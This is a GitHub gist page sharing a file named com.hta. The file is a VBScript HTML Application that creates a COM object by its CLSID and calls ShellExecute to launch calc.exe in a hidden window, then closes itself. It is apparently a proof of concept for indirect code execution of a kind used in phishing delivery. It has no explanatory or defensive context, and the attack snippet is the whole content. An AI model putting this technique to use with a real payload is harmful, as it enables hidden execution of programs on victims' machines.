Skip to content

Instantly share code, notes, and snippets.

@binarytrails
Forked from OlivierLaflamme/com.hta
Created January 25, 2023 20:16
Show Gist options
  • Save binarytrails/b91659165ce158a5f5e840ef48093971 to your computer and use it in GitHub Desktop.
Save binarytrails/b91659165ce158a5f5e840ef48093971 to your computer and use it in GitHub Desktop.
com.hta
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment